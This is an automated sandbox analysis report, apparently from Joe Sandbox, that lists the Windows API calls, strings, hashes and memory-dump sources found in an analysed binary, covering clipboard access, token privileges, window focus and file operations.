                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                                      • API String ID: 2516578528-4164748364
                                                                                                                                                                                                                                                      • Opcode ID: 7685c15193403143203dd4e424128f51d1b08b2edba9dd4b38bba75e2f0cd3b2
                                                                                                                                                                                                                                                      • Instruction ID: d086910eb464ff4b771bb15ef11f5a8059e4de23054329056bcf5fe2091b98ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7685c15193403143203dd4e424128f51d1b08b2edba9dd4b38bba75e2f0cd3b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E132DE78A14254EFDB10CF64D884BAABBB8FF49364F040639F995872A1D731DC09EB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F2B1CD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: %d/%02d/%02d
                                                                                                                                                                                                                                                      • API String ID: 3850602802-328681919
                                                                                                                                                                                                                                                      • Opcode ID: d036e1d7fa502fb8ff7e94831b5fa1d1f3bb94b6df9a5765ab2c4979d8cf7590
                                                                                                                                                                                                                                                      • Instruction ID: a5468ae72a11ae713c1125cb4382d33b9c1150b0ae6fe9dd855487499fc08cfb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d036e1d7fa502fb8ff7e94831b5fa1d1f3bb94b6df9a5765ab2c4979d8cf7590
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B12E171A00229ABEB248F64EC59FAE7BF8FF45720F104119F915EB2D1DB748942EB11
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 00EDEB4A
                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F33AEA
                                                                                                                                                                                                                                                      • IsIconic.USER32(000000FF), ref: 00F33AF3
                                                                                                                                                                                                                                                      • ShowWindow.USER32(000000FF,00000009), ref: 00F33B00
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00F33B0A
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F33B20
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00F33B27
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00F33B33
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F33B44
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00F33B4C
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F33B54
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00F33B57
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F33B6C
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00F33B77
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F33B81
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00F33B86
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F33B8F
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00F33B94
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F33B9E
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00F33BA3
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00F33BA6
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00F33BCD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                                                      • Opcode ID: 258a09da7224775c459d453883dae641e08eec2a48bdab9d71a3671a3b891bd9
                                                                                                                                                                                                                                                      • Instruction ID: f01cd1fb95fb63355dd37c24325758552cf2a1e36dcb2c84691643b031a32f24
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 258a09da7224775c459d453883dae641e08eec2a48bdab9d71a3671a3b891bd9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED31A776B4031CBBEB206B659C49F7F7E6CEB85B60F114015FE05EA1D1DAB05D00BAA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EFB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EFB180
                                                                                                                                                                                                                                                        • Part of subcall function 00EFB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EFB1AD
                                                                                                                                                                                                                                                        • Part of subcall function 00EFB134: GetLastError.KERNEL32 ref: 00EFB1BA
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EFAD08
                                                                                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EFAD5A
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EFAD6B
                                                                                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EFAD82
                                                                                                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 00EFAD9B
                                                                                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00EFADA5
                                                                                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EFADBF
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EFACC0), ref: 00EFAB99
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAB84: CloseHandle.KERNEL32(?,?,00EFACC0), ref: 00EFABAB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                                                                                                      • API String ID: 2063423040-1027155976
                                                                                                                                                                                                                                                      • Opcode ID: 7c17b2a4dc4896ce42c09d096990f1b3ddf30ec20301958a2e5330b6411fc21b
                                                                                                                                                                                                                                                      • Instruction ID: 96ced0edc631024a046258bf8ff0769eb189e4a153ad4ebba6fe9dca6bcd74f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c17b2a4dc4896ce42c09d096990f1b3ddf30ec20301958a2e5330b6411fc21b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29818DB190020DAFDF119FA4CC45AFE7BB9EF14308F085129FA18BA161D7318E95DB22
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F05FA6,?), ref: 00F06ED8
                                                                                                                                                                                                                                                        • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F05FA6,?), ref: 00F06EF1
                                                                                                                                                                                                                                                        • Part of subcall function 00F0725E: __wsplitpath.LIBCMT ref: 00F0727B
                                                                                                                                                                                                                                                        • Part of subcall function 00F0725E: __wsplitpath.LIBCMT ref: 00F0728E
                                                                                                                                                                                                                                                        • Part of subcall function 00F072CB: GetFileAttributesW.KERNEL32(?,00F06019), ref: 00F072CC
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F06149
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F06167
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F0618E
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F061A4
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F06209
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0621C
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0622F
                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00F0625D
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00F0626E
                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00F06289
                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00F06298
                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00F062AD
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00F062BE
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F062E1
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F062FD
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F0630B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                                      • API String ID: 1917200108-1173974218
                                                                                                                                                                                                                                                      • Opcode ID: 8736b6b4bbcb60bab92b16220f6d92d361baee4411a5e9f055851d0fa4be254e
                                                                                                                                                                                                                                                      • Instruction ID: 070060805603388c8a34ce934e4fa38c3cc6f647a79dae883227b061dda1580b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8736b6b4bbcb60bab92b16220f6d92d361baee4411a5e9f055851d0fa4be254e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1513072D0811CAACF21EB91CC44EEBB7FCAF15310F0501EAE545E2141EE769789AFA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00F5DC00), ref: 00F16B36
                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F16B44
                                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 00F16B4C
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00F16B58
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00F16B74
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00F16B7E
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00F16B93
                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00F16BA0
                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 00F16BA8
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00F16BB5
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00F16BE9
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00F16CF6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3222323430-0
                                                                                                                                                                                                                                                      • Opcode ID: 3d614b07d2ba8b18f7864afeae3237292ef58df5a501208cfd09bb586fd09d28
                                                                                                                                                                                                                                                      • Instruction ID: b8ff8ef1806dfcdb7b5df24fae66c8d7d850dbdab3d2f4b6980d1751f91d5b89
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d614b07d2ba8b18f7864afeae3237292ef58df5a501208cfd09bb586fd09d28
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3051E135204205ABD300EF64DD46FAE77A8EFA5B11F01002DFA5AE31E1DF70D946AB62
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F0F62B
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F0F67F
                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F0F6A4
                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F0F6BB
                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F0F6E2
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F72E
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F767
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F7BB
                                                                                                                                                                                                                                                        • Part of subcall function 00EE172B: __woutput_l.LIBCMT ref: 00EE1784
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F809
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F858
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F8A7
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0F8F6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                                                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                      • API String ID: 835046349-2428617273
                                                                                                                                                                                                                                                      • Opcode ID: e0ef98098b8e998aceec52b5b2edebcf0ce3e64617696349d6add287567188e8
                                                                                                                                                                                                                                                      • Instruction ID: 148297dc7552f4e0e7d2ccb473a7e0399643e01781a59c4ce1addefacfa597df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0ef98098b8e998aceec52b5b2edebcf0ce3e64617696349d6add287567188e8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAA12FB2408344ABC310EB95CD85EAFB7ECFF99700F44182EF58592292EB35D949D762
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F11B50
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11B65
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11B7C
                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00F11B8E
                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00F11BA8
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F11BC0
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F11BCB
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00F11BE7
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11C0E
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11C25
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F11C37
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00F739FC), ref: 00F11C55
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F11C5F
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F11C6C
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F11C7C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                      • API String ID: 1803514871-438819550
                                                                                                                                                                                                                                                      • Opcode ID: 2f149f71133b664a3a5052738d7730d947a4ba85b7563b0ebf26631455d1ab03
                                                                                                                                                                                                                                                      • Instruction ID: db56147707081626f5c8283569a10bc80b241f8c4a05e6d2bdc310d47361cee1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f149f71133b664a3a5052738d7730d947a4ba85b7563b0ebf26631455d1ab03
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C31B636A0521D6BDF10DFA0DC49ADE77ACAF46320F104196EE15E2090EB70DAC5AA64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F11CAB
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11CC0
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11CD7
                                                                                                                                                                                                                                                        • Part of subcall function 00F06BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F06BEF
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F11D06
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F11D11
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00F11D2D
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11D54
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F11D6B
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F11D7D
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00F739FC), ref: 00F11D9B
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F11DA5
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F11DB2
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F11DC2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                                                                                                                                                      • Opcode ID: 2e2f2b3a35221a265331da7f041ad41899782cfeb0f0568b7fca9e4a70da158d
                                                                                                                                                                                                                                                      • Instruction ID: 96e19c0078f6c75050cebf528611ef59faa989de43a798c7b66015c0c34039c2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2f2b3a35221a265331da7f041ad41899782cfeb0f0568b7fca9e4a70da158d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6131063290061E7ADF20EFA0EC09ADE77ADAF46334F104595EE01A3090DB70DAC5EA65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
